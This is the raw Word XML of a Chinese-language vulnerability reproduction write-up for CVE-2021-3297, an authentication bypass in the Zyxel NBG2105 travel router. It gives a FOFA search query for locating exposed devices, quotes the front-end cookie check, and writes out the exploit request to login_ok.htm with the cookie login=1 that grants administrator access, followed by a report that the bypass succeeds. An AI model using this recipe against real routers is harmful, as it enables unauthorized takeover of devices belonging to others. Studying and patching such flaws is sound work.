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jc w:val="center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5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Zyxel NBG2105 身份验证绕过 CVE-2021-3297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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zyxel NBG2105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(ZyXEL无线N150旅行路由器)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在身份验证绕过，攻击者通过更改 login参数可用实现后台登陆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(将登录cookie设置为1可提供管理员访问权限。)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漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zyxel NBG2105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</w:rPr>
        <w:t>漏洞复现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FOFA: app="ZyXEL-NBG2105"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2583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2）登录界面如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="241998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3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其中前端文件 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://you-ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/js/util_gw.js 存在前端对 Cookie login参数的校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="271018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可以看到检测到 Cookie中的 login=1 则跳转 home.html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setCookie() //login_ok.htm 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document.cookie="login=1";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MM_goToURL('parent', 'home.htm');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请求如下则会以管理员身份跳转到 home.htm页面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http://xxx.xxx.xxx.xxx/login_ok.htm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Cookie: login=1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4）</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功绕过登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="635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307BD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="532307B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20C"/>
    <w:rsid w:val="0FF669DC"/>
    <w:rsid w:val="18A25542"/>
    <w:rsid w:val="19453041"/>
    <w:rsid w:val="19FB1089"/>
    <w:rsid w:val="24FF217A"/>
    <w:rsid w:val="28D50710"/>
    <w:rsid w:val="2CFE3389"/>
    <w:rsid w:val="3E570F26"/>
    <w:rsid w:val="46E87D57"/>
    <w:rsid w:val="581643BD"/>
    <w:rsid w:val="5C210D33"/>
    <w:rsid w:val="5F016BE2"/>
    <w:rsid w:val="6123300A"/>
    <w:rsid w:val="71E21187"/>
    <w:rsid w:val="749C40E9"/>
    <w:rsid w:val="7754440C"/>
    <w:rsid w:val="7BED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2021-04-06T06:57:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-06T09:33:04Z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